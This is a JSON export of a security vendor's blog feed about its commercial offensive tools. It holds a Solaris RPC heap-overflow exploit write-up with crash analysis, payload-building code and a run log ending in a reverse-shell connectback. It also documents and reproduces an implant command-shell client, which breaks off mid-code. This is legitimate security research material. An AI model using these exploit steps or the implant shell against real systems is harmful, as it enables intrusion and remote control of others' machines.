{"rss":{"$":{"xmlns:atom":"http://www.w3.org/2005/Atom","xmlns:openSearch":"http://a9.com/-/spec/opensearchrss/1.0/","xmlns:blogger":"http://schemas.google.com/blogger/2008","xmlns:georss":"http://www.georss.org/georss","xmlns:gd":"http://schemas.google.com/g/2005","xmlns:thr":"http://purl.org/syndication/thread/1.0","version":"2.0"},"channel":[{"atom:id":["tag:blogger.com,1999:blog-7337853103195839314"],"lastBuildDate":["Wed, 06 Mar 2024 07:33:45 +0000"],"category":["CANVAS","silica","El Jefe","infiltrate","innuendo","mosdef","routers","swarm","CVE-2013-0640","Java","WPS","adobe","stalker","training","wireless"],"title":["Immunity Products"],"description":[""],"link":["https://immunityproducts.blogspot.com/"],"managingEditor":["noreply@blogger.com (Dave Aitel)"],"generator":["Blogger"],"openSearch:totalResults":["62"],"openSearch:startIndex":["1"],"openSearch:itemsPerPage":["25"],"item":[{"guid":[{"_":"tag:blogger.com,1999:blog-7337853103195839314.post-1657969705329572559","$":{"isPermaLink":"false"}}],"pubDate":["Tue, 13 Nov 2018 17:43:00 +0000"],"atom:updated":["2018-11-14T05:02:11.661-08:00"],"title":["Recent kernel memory disclosure bugs in CANVAS"],"description":["In July 2017, a blogpost from Anders Fogh introduced the idea of leaking kernel memory from the unprivileged userland. This was later followed by the public introduction of both Spectre and Meltdown and their corresponding coverage in the media. For Immunity this was the perfect opportunity to not only write two Spectre exploits for CANVAS (the Windows version being CEU only) but also a framework dedicated to this vulnerability class. In particular we also wrote CANVAS exploits for CVE-2017-18344 and CVE-2018-14656 . Some of our exploitation notes have been published on the Immunity website:
\n\nPart 1: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_1.pdf
\nPart 2: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_2.pdf
\n"],"link":["https://immunityproducts.blogspot.com/2018/11/recent-kernel-memory-disclosure-bugs-in.html"],"author":["noreply@blogger.com (Unknown)"],"thr:total":["0"],"text_description":"In July 2017, a blogpost from Anders Fogh introduced the idea of leaking kernel memory from the unprivileged userland. This was later followed by the public introduction of both Spectre and Meltdown and their corresponding coverage in the media. For Immunity this was the perfect opportunity to not only write two Spectre exploits for CANVAS (the Windows version being CEU only) but also a framework dedicated to this vulnerability class. In particular we also wrote CANVAS exploits for CVE-2017-18344 and CVE-2018-14656 . Some of our exploitation notes have been published on the Immunity website:\n\nPart 1: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_1.pdf\nPart 2: https://www.immunityinc.com/downloads/Kernel-Memory-Disclosure-and-Canvas_Part_2.pdf\n"},{"guid":[{"_":"tag:blogger.com,1999:blog-7337853103195839314.post-2874883352312700994","$":{"isPermaLink":"false"}}],"pubDate":["Mon, 10 Jul 2017 20:12:00 +0000"],"atom:updated":["2017-07-11T14:20:25.813-07:00"],"title":[""],"description":["
\nbash-3.00#\n /opt/csw/bin/gdb /usr/sbin/rpc.metamhd core \n\nGNU\n gdb (GDB) 7.7 \n\n[...] \n\nReading\n symbols from /usr/sbin/rpc.metamhd...(no debugging symbols\n found)...done . \n\n[New\n LWP 1] \n\n[New\n LWP 2] \n\n[Thread\n debugging using libthread_db enabled] \n\n[New\n Thread 1 (LWP 1)] \n\n[New\n Thread 2 (LWP 2)] \n\nCore\n was generated by `/usr/sbin/rpc.metamhd'. \n\nProgram\n terminated with signal SIGSEGV, Segmentation fault. \n\n#0\n 0xd0efe2cc in xdr_replymsg () from /lib/libnsl.so.1 \n\n(gdb)\n bt \n\n#0\n 0xd0efe2cc in xdr_replymsg () from /lib/libnsl.so.1 \n\n#1\n 0xd0f0c09e in svc_vc_reply () from /lib/libnsl.so.1 \n\n#2\n 0xd0f03c47 in svcerr_noprog () from /lib/libnsl.so.1 \n\n#3\n 0xd0f040fa in _svc_prog_dispatch () from /lib/libnsl.so.1 \n\n#4\n 0xd0f08bfc in _svc_run_mt () from /lib/libnsl.so.1 \n\n#5\n 0xd0f08473 in svc_run () from /lib/libnsl.so.1 \n\n#6\n 0x08057094 in main () \n\n(gdb)\n print /x $ecx \n\n$1\n = 0x450685ec <--\n 0x450685ec was read from\n the network buffer \n\n(gdb)\n x/6i $pc \n\n=>\n 0xd0efe2cc <xdr_replymsg+75>: mov 0x18(%ecx),%ecx \n <-- control of %ecx \n \n\nis\n possible \n\n0xd0efe2cf\n <xdr_replymsg+78>: add $0x18,%eax \n\n0xd0efe2d2\n <xdr_replymsg+81>: push %eax \n\n0xd0efe2d3\n <xdr_replymsg+82>: push %edi \n\n0xd0efe2d4\n <xdr_replymsg+83>: call *%ecx <--\n If %ecx can be \n\ncontrolled,\n %EIP \n\ncan\n be set. \n\n0xd0efe2d6\n <xdr_replymsg+85>: add $0x8,%esp \n\n(gdb) \n | \n
\n[...] \n\n area\n = (struct area *)rqst->rq_clntcred; \n\n aup\n = &area->area_aup; \n\n[...] \n\n gid_len\n = IXDR_GET_U_INT32(buf); // reads the gid_len (unsigned) \n \n\n \n on\n the network \n\n if\n (gid_len > NGRPS_LOOPBACK) { // security check \n\n stat\n = AUTH_BADCRED; \n\n goto\n done; \n\n } \n\n aup->aup_len\n = gid_len; \n\n for\n (i = 0; i < gid_len; i++) { \n\n aup->aup_gids[i]\n = (gid_t)IXDR_GET_INT32(buf); \n\n } \n | \n
\nSVCXPRT\n * \n\nsvc_xprt_alloc(void) \n\n{ \n\n[..] \n\n if\n ((cred_area = malloc(2*MAX_AUTH_BYTES + RQCRED_SIZE)) == NULL) \n\n goto\n err_exit; \n\n xt->cred_area\n = cred_area; \n\n[...] \n\n return\n (xprt); \n\nerr_exit: \n\n svc_xprt_free(xprt); \n\n return\n (NULL); \n\n} \n | \n
\nvoid \n\nsvc_getreq_common(const\n int fd) \n\n{ \n\n SVCXPRT\n *xprt; \n\n enum\n xprt_stat stat; \n\n struct\n rpc_msg *msg; \n\n struct\n svc_req *r; \n\n char\n *cred_area; \n\n \n\n[...] \n\n if\n ((fd >= nsvc_xports) || (xprt = svc_xports[fd]) == NULL) { \n // [L1] \n\n (void)\n rw_unlock(&svc_fd_lock); \n\n return; \n\n } \n\n[...] \n\n r\n = SVCEXT(xprt)->req; \n // [L2] \n\n[...] \n\n cred_area\n = SVCEXT(xprt)->cred_area; \n\n msg->rm_call.cb_cred.oa_base\n = cred_area; \n\n msg->rm_call.cb_verf.oa_base\n = &(cred_area[MAX_AUTH_BYTES]); \n\n r->rq_clntcred\n = &(cred_area[2 * MAX_AUTH_BYTES]); // [L3] \n | \n
\n.text:00044166\n push 24h ; '$' ; size \n\n.text:00044168\n call _malloc \n\n.text:0004416D\n add esp, 4 \n\n.text:00044170\n test eax, eax \n\n.text:00044172\n jz short loc_441A7 \n\n.text:00044174\n mov [edi+0Ch], eax \n\n.text:00044177\n push 4B0h ; size <--\n 1200 bytes \n\n.text:0004417C\n call _malloc \n\n.text:00044181\n add esp, 4 \n\n.text:00044184\n test eax, eax \n | \n
\n.text:0004464E\n push 24h ; '$' ; size \n\n.text:00044650\n call _malloc \n\n.text:00044655\n add esp, 4 \n\n.text:00044658\n test eax, eax \n\n.text:0004465A\n jz short loc_4468F \n\n.text:0004465C\n mov [edi+0Ch], eax \n\n.text:0004465F\n push 538h ; size <--\n 1336 bytes \n\n.text:00044664\n call _malloc \n\n.text:00044669\n add esp, 4 \n\n.text:0004466C\n test eax, eax \n | \n
\nbash-3.2#\n cat /var/adm/messages|grep maintenance \n\nJun\n 13 11:42:34 Host-001 svc.startd[8]: [ID 748625 daemon.error]\n network/rpc/bootparams:default failed\n repeatedly: transitioned to maintenance (see 'svcs -xv' for\n details) \n\nJun\n 14 08:10:28 Host-002 svc.startd[8]: [ID 748625 daemon.error]\n network/rpc/bootparams:default failed repeatedly: transitioned to\n maintenance (see 'svcs -xv' for details) \n\nJun\n 14 08:14:08 Host-002 svc.startd[8]: [ID 748625 daemon.error]\n network/rpc/bootparams:default failed repeatedly: transitioned to\n maintenance (see 'svcs -xv' for details) \n\nJun\n 14 08:34:33 Host-002 svc.startd[8]: [ID 748625 daemon.error]\n network/rpc/bootparams:default failed repeatedly: transitioned to\n maintenance (see 'svcs -xv' for details) \n\nbash-3.2#\n svcs -xv \n\nsvc:/application/print/server:default\n (LP print server) \n\nState:\n disabled since Wed Jun 14 08:15:58 2017 \n\nReason:\n Disabled by an administrator. \n\nSee:\n http://sun.com/msg/SMF-8000-05 \n\nSee:\n man -M /usr/share/man -s 1M lpsched \n\nImpact:\n 2 dependent services are not running: \n\nsvc:/application/print/rfc1179:default \n\nsvc:/application/print/ipp-listener:default \n\n \n\nsvc:/network/rpc/bootparams:default\n (boot parameter server) \n\n State:\n maintenance since Wed Jun 14 08:34:33 2017 \n\nReason:\n Restarting too quickly. \n\n See:\n http://sun.com/msg/SMF-8000-L5 \n\n See:\n man -M /usr/share/man -s 1M rpc.bootparamd \n\n See:\n /var/svc/log/network-rpc-bootparams:default.log \n\nImpact:\n This service is not running. \n\nbash-3.2# \n |
\nbash-3.00#\n pmap core*|grep ld|grep 160K \n\nD13C4000\n 160K r-x-- /lib/ld.so.1 \n\nD0FC4000\n 160K r-x-- /lib/ld.so.1 \n\nD0FC4000\n 160K r-x-- /lib/ld.so.1 \n\nD13C4000\n 160K r-x-- /lib/ld.so.1 \n\nD0FC4000\n 160K r-x-- /lib/ld.so.1 \n\nD0FC4000\n 160K r-x-- /lib/ld.so.1 \n\nD13C4000\n 160K r-x-- /lib/ld.so.1 \n | \n
\npattern\n += struct.pack('>L', 0x200) # t_s +0 \n\npattern\n += struct.pack('>L', 0) \n\npattern\n += struct.pack('>L', self.where) # t_p +8 \n\npattern\n += struct.pack('>L', 0) \n\npattern\n += struct.pack('>L', 0xffffffff) # t_l +16 \n\npattern\n += struct.pack('>L', 0) \n\npattern\n += struct.pack('>L', 0) # t_r +24 \n\npattern\n += struct.pack('>L', 0) \n\npattern\n += struct.pack('>L', self.what) # t_n +32 # Must be\n writable! \n\npattern\n += struct.pack('>L', 0) \n | \n
\ntypedef\n struct rec_strm { \n\n caddr_t\n tcp_handle; \n\n[...] \n\n int\n (*writeit)(); \n\n caddr_t\n out_base; /* output buffer (points to frag header) */ \n\n caddr_t\n out_finger; /* next output position */ \n\n caddr_t\n out_boundry; /* data cannot up to this address */ \n\n uint32_t\n *frag_header; /* beginning of current fragment */ \n\n bool_t\n frag_sent; /* true if buffer sent in middle of record */ \n\n[...] \n\n int\n (*readit)(); \n\n caddr_t\n in_base; /* input buffer */ \n\n caddr_t\n in_finger; /* location of next byte to be had */ \n\n caddr_t\n in_boundry; /* can read up to this location */ \n\n int\n fbtbc; /* fragment bytes to be consumed */ \n\n bool_t\n last_frag; \n\n uint_t\n sendsize; \n\n uint_t\n recvsize; \n\n[...] \n\n uint_t\n firsttime; \n\n[...] \n\n uint_t\n in_nonblock; /* non-blocked input */ \n\n uint_t\n in_needpoll; /* need to poll to get more data ? */ \n\n uint32_t\n in_maxrecsz; /* maximum record size */ \n\n caddr_t\n in_nextrec; /* start of next record */ \n\n uint32_t\n in_nextrecsz; /* part of next record in buffer */ \n\n}\n RECSTREAM; \n |
\n#define\n AT_SUN_UID 2000 /* effective user id */ \n\n#define\n AT_SUN_RUID 2001 /* real user id */ \n\n#define\n AT_SUN_GID 2002 /* effective group id */ \n\n#define\n AT_SUN_RGID 2003 /* real group id */ \n\n[...] \n\n#define\n AT_SUN_LDELF 2004 /* dynamic linker's ELF header */ \n\n#define\n AT_SUN_LDSHDR 2005 /* dynamic linker's section headers */ \n\n#define\n AT_SUN_LDNAME 2006 /* name of dynamic linker */ \n\n#define\n AT_SUN_LPAGESZ 2007 /* large pagesize */ \n\n[…] \n\n#define\n AT_SUN_MMU 2015 /* mmu module name */ \n\n#define\n AT_SUN_LDDATA 2016 /* dynamic linkers data segment */ \n | \n
\n80760ae:\n 8b e5 mov %ebp,%esp ;\n stack is controlled \n\n80760b0:\n 5d pop %ebp ; therefore\n the next \n\n80760b1:\n c3 ret ; pop\n are controlled. \n | \n
\n2017-06-26\n 17:50:36,532 [ exploitutils.py] - INFO - Discovered\n interfaces: \n\n2017-06-26\n 17:50:36,532 [ exploitutils.py] - INFO - - ['lo',\n '127.0.0.1', '255.0.0.0'] \n\n2017-06-26\n 17:50:36,532 [ exploitutils.py] - INFO - -\n ['enp0s3-ipv6', 'fe80::61:853c:fa1b:3af6:76',\n 'ffff:ffff:ffff:ffff::'] \n\n[...] \n\n2017-06-26\n 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - OS detected:\n Solaris ['10', '11'] \n \n\n2017-06-26\n 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - >>>\n Method #1: Attempting to exploit bootparam \n\n2017-06-26\n 17:50:36,657 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Checking if\n bootparam is available \n\n2017-06-26\n 17:50:36,663 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK \n\n2017-06-26\n 17:50:36,664 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Expecting\n an u10 version \n\n2017-06-26\n 17:50:36,664 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Testing\n x86 target \n\n2017-06-26\n 17:50:37,430 [ solaris_rpc_libnsl_ng2.py] - INFO - Waiting 2.00\n sec \n\n2017-06-26\n 17:50:40,540 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Testing\n amd64 target \n\n2017-06-26\n 17:50:41,259 [ solaris_rpc_libnsl_ng2.py] - INFO - Waiting 2.00\n sec \n\n2017-06-26\n 17:50:44,370 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Starting\n the generic attack \n\n2017-06-26\n 17:50:44,371 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to\n find the \"leaky\"'s RECSTREAM object \n\n2017-06-26\n 17:50:44,371 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n the ultra-fast range \n\n2017-06-26\n 17:50:46,362 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] RECSTREAM\n object is at: 0x080ae080 \n\n2017-06-26\n 17:50:48,352 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.tcp_handle = 0x080ad8b0 \n\n2017-06-26\n 17:50:48,354 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.writeit = 0xfef3bdf4 \n\n2017-06-26\n 17:50:48,355 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.out_base = 0x080ae000 \n\n2017-06-26\n 17:50:48,355 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.out_finger = 0x080ae104 \n\n2017-06-26\n 17:50:48,356 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.out_boundry = 0x080b0408 \n\n2017-06-26\n 17:50:48,357 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.frag_header = 0x080ae0e0 \n\n2017-06-26\n 17:50:48,357 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.frag_sent = 0 \n\n2017-06-26\n 17:50:48,358 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.readit = 0x00000000 \n\n2017-06-26\n 17:50:48,358 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.in_base = 0x080b0410 \n\n2017-06-26\n 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.in_finger = 0x080b13b0 \n\n2017-06-26\n 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.in_boundry = 0x080b13b0 \n\n2017-06-26\n 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.fbtbc = 0 \n\n2017-06-26\n 17:50:48,359 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.last_frag = 1 \n\n2017-06-26\n 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.sendsize = 9000 [0x00002328] \n\n2017-06-26\n 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.recvsize = 4000 [0x00000fa0] \n\n2017-06-26\n 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.firsttime = 0 \n\n2017-06-26\n 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.in_nonblock = 0 \n\n2017-06-26\n 17:50:48,360 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.in_needpoll = 1 \n\n2017-06-26\n 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.in_maxrecsz = 0 \n\n2017-06-26\n 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.in_nextrec = 0x080b0410 \n\n2017-06-26\n 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO -\n recstream.in_nextrecsz = 0 \n\n2017-06-26\n 17:50:48,361 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to\n find the associated 'XDR' object and the place to store a fake\n RECSTREAM \n\n2017-06-26\n 17:50:50,361 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found\n the XDR object at 0x080adec4: \n\n2017-06-26\n 17:50:50,362 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_op = 0 \n\n2017-06-26\n 17:50:50,363 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_ops =\n 0xfef88998 \n\n2017-06-26\n 17:50:50,364 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_public\n = 0x00000000 \n\n2017-06-26\n 17:50:50,364 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_private\n = 0x080ae080 [RECSTREAM object] \n\n2017-06-26\n 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_base =\n 0x00000000 \n\n2017-06-26\n 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - xdrs.x_handy =\n 0 \n\n2017-06-26\n 17:50:50,365 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found\n the perfect place to store our fake RECSTREAM: 0x080ada00 \n\n2017-06-26\n 17:50:50,366 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] libnsl is\n loaded at 0xfef80000 \n\n2017-06-26\n 17:50:50,366 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to\n find the ret2ld payload \n\n2017-06-26\n 17:50:57,920 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Found the\n payload! \n\n2017-06-26\n 17:50:57,922 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found\n ret2addr payload at 0x080aa828 \n\n2017-06-26\n 17:50:57,923 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Trying to\n find the STACK \n\n2017-06-26\n 17:50:57,923 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n to leak [0x08046000, 0x080467ff] \n\n2017-06-26\n 17:50:59,811 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we\n could leak 2048 bytes at 08046000 \n\n2017-06-26\n 17:51:00,314 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n to leak [0x08046800, 0x08046fff] \n\n2017-06-26\n 17:51:02,198 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we\n could leak 2048 bytes at 08046800 \n\n2017-06-26\n 17:51:02,700 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n to leak [0x08047000, 0x080477ff] \n\n2017-06-26\n 17:51:04,590 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we\n could leak 2048 bytes at 08047000 \n\n2017-06-26\n 17:51:05,092 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n to leak [0x08047800, 0x08047bff] \n\n2017-06-26\n 17:51:06,989 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we\n could leak 1024 bytes at 08047800 \n\n2017-06-26\n 17:51:07,491 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n to leak [0x08047c00, 0x08047dff] \n\n2017-06-26\n 17:51:09,387 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we\n could leak 512 bytes at 08047c00 \n\n2017-06-26\n 17:51:09,889 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n to leak [0x08047e00, 0x08047e7f] \n\n2017-06-26\n 17:51:11,778 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we\n could leak 128 bytes at 08047e00 \n\n2017-06-26\n 17:51:12,280 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n to leak [0x08047e80, 0x08047eff] \n\n2017-06-26\n 17:51:14,167 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we\n could leak 128 bytes at 08047e80 \n\n2017-06-26\n 17:51:14,670 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n to leak [0x08047f00, 0x08047f1f] \n\n2017-06-26\n 17:51:16,556 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we\n could leak 32 bytes at 08047f00 \n\n2017-06-26\n 17:51:17,059 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n to leak [0x08047f20, 0x08047f3f] \n\n2017-06-26\n 17:51:18,946 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we\n could leak 32 bytes at 08047f20 \n\n2017-06-26\n 17:51:19,449 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n to leak [0x08047f40, 0x08047f5f] \n\n2017-06-26\n 17:51:21,337 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we\n could leak 32 bytes at 08047f40 \n\n2017-06-26\n 17:51:21,839 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Trying\n to leak [0x08047f60, 0x08047f7f] \n\n2017-06-26\n 17:51:23,727 [ solaris_rpc_libnsl_ng2.py] - INFO - -> OK we\n could leak 32 bytes at 08047f60 \n\n2017-06-26\n 17:51:24,229 [ solaris_rpc_libnsl_ng2.py] - INFO - [+] Analyzing\n the stack [0x08046000, 0x08047f7f] \n\n2017-06-26\n 17:51:24,252 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found\n LD_DATA at 0xfeffb000 \n\n2017-06-26\n 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - -> Found\n our target FP copy at 0x08047d04 \n\n2017-06-26\n 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - The infoleak is\n a success, let's try to get the shell now! \n\n2017-06-26\n 17:51:24,254 [ solaris_rpc_libnsl_ng2.py] - INFO - Trying first\n with saved_ebp = 08047d04 \n\n2017-06-26\n 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Got a shell! \n\n2017-06-26\n 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Solaris libnsl\n (RPC) - Remote Heap Overflow attacking 192.168.1.147:33583\n (succeeded!) \n\n2017-06-26\n 17:51:26,188 [ solaris_rpc_libnsl_ng2.py] - INFO - Solaris libnsl\n (RPC) - Remote Heap Overflow done (Success!) \n\n2017-06-26\n 17:51:26,188 [ exploitutils.py] - INFO - done --\n connectback set to 192.168.1.186:5555 \n | \n
usage: shell.py [-h] [-c COMMAND] [--no-cache] [--token-user TOKEN_USER]\n [--token-luid TOKEN_LUID] [-p PROMPT] [-u URL]\n process_implant_id\n\nCommand-line interface to an INNUENDO implant target shell.\n\nNOTE: The \"process_implant_id\" argument refers to the hash ID listed for an\nimplant in the process_list. Not to be confused with the PID.\n\n $ ./rpc.py process_list\n Machine: <machine_id>\n Node: <node_id>\n <process_implant_id> | synced | ...\n\npositional arguments:\n process_implant_id the ID of the implant process to target\n\noptional arguments:\n -h, --help show this help message and exit\n -c COMMAND, --command COMMAND\n execute a command then exit\n --no-cache do not use cached data for initialization\n --token-user TOKEN_USER\n attempt impersonation of a \"[domain\\]user\"\n --token-luid TOKEN_LUID\n sets a token LUID for impersonation\n -p PROMPT, --prompt PROMPT\n a windows prompt format string\n -u URL, --url URL rpc server url\n
\n$ ./rpc.py process_list \nMachine: 96e41afa2cfbe7b26d3b5c397abb2b8f5198bdb3\n Node: c8aaddbc059b40f4a3f7d61945cb2684\n b850bef0abe4417debc273c640be7e58 | synced | 2016-12-14 13:31:47 | boot64.exe (1572)\n Node: nt authority\\system\n de1014f777018dffd21678d2e7a3f5c0 | synced | 2016-12-14 13:31:50 | netclassmon.exe (1864)\n
\n$ python -m examples.rpc.shell de1014f777018dffd21678d2e7a3f5c0\ninitializing ...\nMicrosoft Windows [Version 6.1.7601]\n\nC:\\Windows\\system32> whoami\nnt authority\\system\nC:\\Windows\\system32> exit\n
\n$ python -m examples.rpc.shell de1014f777018dffd21678d2e7a3f5c0 --token-user immunity\ninitializing ...\nMicrosoft Windows [Version 6.1.7601]\n\nC:\\Windows\\system32> whoami\nbunny\\immunity\n
\nC:\\Windows\\system32> cd c:\\users\\administrator\nAccess is denied.\nC:\\Windows\\system32> cd c:\\users\\immunity\nc:\\Users\\immunity> dir\n Volume in drive C has no label.\n Volume Serial Number is 883B-C53C\n\n Directory of c:\\Users\\immunity\n\n12/19/2013 05:11 PM <DIR> .\n12/19/2013 05:11 PM <DIR> ..\n12/19/2013 05:11 PM <DIR> Contacts\n07/13/2016 10:46 AM <DIR> Desktop\n12/19/2013 05:11 PM <DIR> Documents\n12/20/2013 12:14 PM <DIR> Downloads\n12/19/2013 05:11 PM <DIR> Favorites\n12/19/2013 05:11 PM <DIR> Links\n12/19/2013 05:11 PM <DIR> Music\n12/19/2013 05:11 PM <DIR> Pictures\n12/19/2013 05:11 PM <DIR> Saved Games\n12/19/2013 05:11 PM <DIR> Searches\n12/19/2013 05:11 PM <DIR> Videos\n 0 File(s) 0 bytes\n 13 Dir(s) 54,171,832,320 bytes free\nc:\\Users\\immunity>\n
\ntry:\n import readline\nexcept ImportError:\n pass\n
\nPROMPT = '$p$g$s'\nTAG_ENV = 'shell:environment'\nTAG_META = 'shell:metadata'\n
\n def repl(self):\n \"\"\"The Read-Eval-Print Loop.\"\"\"\n
\n while True:\n prompt = self.parse_prompt()\n oper_id = None\n try:\n line = raw_input(prompt).strip()\n
\n oper_id = self.execute(line, wait=wait)\n
\n search = ' '.join([TAG_ENV, token_tag, self.proc_id])\n res = c.operation_list(search=search, limit=1)\n if res['records']:\n oper = res['records'][0]\n self.check_error(oper)\n self.env = c.operation_attributes(oper['id'])['env']\n
\n oper_id = c.operation_execute('recon', 'environment', self.proc_id)[0]\n self.check_error(c.operation_wait(oper_id)[0])\n\n self.env = c.operation_attributes(oper_id)['env']\n\n c.operation_tag_add(TAG_ENV, oper_id)\n c.operation_tag_add(token_tag, oper_id)\n
\n command = 'cd /D %s && %s' % (self.cwd, command)\n
\n tag = ':'.join(['cmd', command.split(None, 1)[0]])\n
\n res = c.operation_execute('filemanager', 'execute', self.proc_id, args=args)\n c.operation_tag_add(tag, res[0])\n
\n#! /usr/bin/env python\n\n\"\"\"\nCommand-line interface to an INNUENDO implant target shell.\n\"\"\"\n\nimport re\nimport sys\nimport ntpath\ntry:\n import readline\nexcept ImportError:\n pass\n\nimport rpc\n\nPROMPT = '$p$g$s'\nTAG_ENV = 'shell:environment'\nTAG_META = 'shell:metadata'\n\nrx_prompt = re.compile(r'[$](.)')\n\nclass Shell(object):\n def __init__(self, client, proc_id, token_user=None, token_luid=None, prompt=None):\n self.client = client\n self.proc_id = proc_id\n self.env = None\n self.ver = None\n self.cwd = None\n self.token_user = token_user\n self.token_luid = token_luid\n self.prompt = prompt\n\n def repl(self):\n \"\"\"The Read-Eval-Print Loop.\"\"\"\n c = self.client\n\n print self.ver\n print\n\n while True:\n prompt = self.parse_prompt()\n oper_id = None\n try:\n line = raw_input(prompt).strip()\n if not line:\n continue\n if line.lower() == 'exit':\n break\n if line.lower().startswith('cd'):\n try:\n path = line.split(' ', 1)[1].strip()\n except IndexError:\n pass\n else:\n self.chdir(path)\n continue\n wait = line[-1] != '&'\n\n oper_id = self.execute(line, wait=wait)\n if wait:\n self.wait(oper_id)\n print self.output(oper_id)\n\n except EOFError:\n break\n except KeyboardInterrupt:\n print\n continue\n\n def setup(self, cached=True):\n \"\"\"Collect metadata used to format the shell.\n\n Uses existing operations when *cached* is `True`.\n \"\"\"\n c = self.client\n\n # if the luid is set, it takes precedence\n token_tag = ':'.join(['token', self.token_luid or self.token_user or 'none'])\n\n if cached:\n # check past ops\n search = ' '.join([TAG_META, token_tag, self.proc_id])\n res = c.operation_list(search=search, limit=1)\n if res['records']:\n oper = res['records'][0]\n self.check_error(oper)\n self.ver, self.cwd = self.output(oper['id']).strip().splitlines()\n\n search = ' '.join([TAG_ENV, token_tag, self.proc_id])\n res = c.operation_list(search=search, limit=1)\n if res['records']:\n oper = res['records'][0]\n self.check_error(oper)\n self.env = c.operation_attributes(oper['id'])['env']\n\n if not self.cwd:\n oper_id = self.execute('ver && cd')\n self.check_error(self.wait(oper_id))\n\n self.ver, self.cwd = self.output(oper_id).strip().splitlines()\n\n c.operation_tag_add(TAG_META, oper_id)\n c.operation_tag_add(token_tag, oper_id)\n\n if not self.env:\n oper_id = c.operation_execute('recon', 'environment', self.proc_id)[0]\n self.check_error(c.operation_wait(oper_id)[0])\n\n self.env = c.operation_attributes(oper_id)['env']\n\n c.operation_tag_add(TAG_ENV, oper_id)\n c.operation_tag_add(token_tag, oper_id)\n\n def execute(self, command, wait=True):\n \"\"\"Executes a command on the targets and returns the operation ID.\"\"\"\n c = self.client\n\n tag = ':'.join(['cmd', command.split(None, 1)[0]])\n if self.cwd:\n command = 'cd /D %s && %s' % (self.cwd, command)\n args = {\n 'path': command,\n 'shell': True,\n 'output_capture': True,\n }\n if not wait:\n args['output_capture'] = False\n args['wait'] = False\n if self.token_user:\n args['token_domain_user'] = self.token_user\n if self.token_luid:\n args['token_luid'] = self.token_luid\n\n res = 